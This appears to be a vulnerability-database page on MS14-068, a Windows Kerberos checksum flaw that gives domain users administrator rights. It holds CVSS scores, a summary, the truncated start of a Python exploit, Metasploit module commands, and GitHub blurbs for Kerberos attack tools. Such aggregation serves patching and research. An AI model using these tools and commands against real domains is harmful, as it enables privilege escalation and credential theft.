Published: 18/11/2014 Updated: 12/10/2018
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 937
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

The Kerberos Key Distribution Center (KDC) in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka "Kerberos Checksum Vulnerability."


#!/usr/bin/python # MS14-068 Exploit # Author # ------ # Sylvain Monne # Contact : sylvain dot monne at solucom dot fr # twittercom/bidord import sys, os from random import getrandbits from time import time, localtime, strftime from kekccache import CCache, get_tgt_cred, kdc_rep2ccache from kekcrypto import generate_subkey, ntlm_has ...

Metasploit Modules

MS14-068 Microsoft Kerberos Checksum Validation Vulnerability

This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS request, where a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz help. It has been tested successfully on Windows 2008.

msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
      msf auxiliary(ms14_068_kerberos_checksum) > show actions
      msf auxiliary(ms14_068_kerberos_checksum) > set ACTION <action-name>
      msf auxiliary(ms14_068_kerberos_checksum) > show options
            ...show and set options...
      msf auxiliary(ms14_068_kerberos_checksum) > run

Github Repositories

as-rep-roast Author Jason Martinsen Python code to execute an AS-REP Roasting attack USE ONLY AGAINST AUTHORIZED TARGETS Usage : USAGE: as-rep-roastpy -u &lt;userName&gt;@&lt;domainName&gt; -d &lt;domainControlerAddr&gt; Hashcat compatible output will be piped to screen and to hashcatout file This code is based on the code from the below project

Python Kerberos Exploitation Kit PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data (Still in development) For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) More is coming Author Sylvain Monné Contact : sylvain dot monne at solucom dot fr ht

License DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE Version 3, August 2017 Everyone is permitted to copy and distribute verbatim or modified copies of this license document, and changing it is allowed as long as the name is changed DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION You just DO WHAT THE FUCK YOU WANT TO

██╗ ██╗███████╗██╗ ██████╗ ███████╗██╗ ██╗██╗ ██║ ██║██╔════╝██║ ██╔══██╗██╔════╝██║ ██║██║ ███████║█████╗ ██║ ██████╔╝████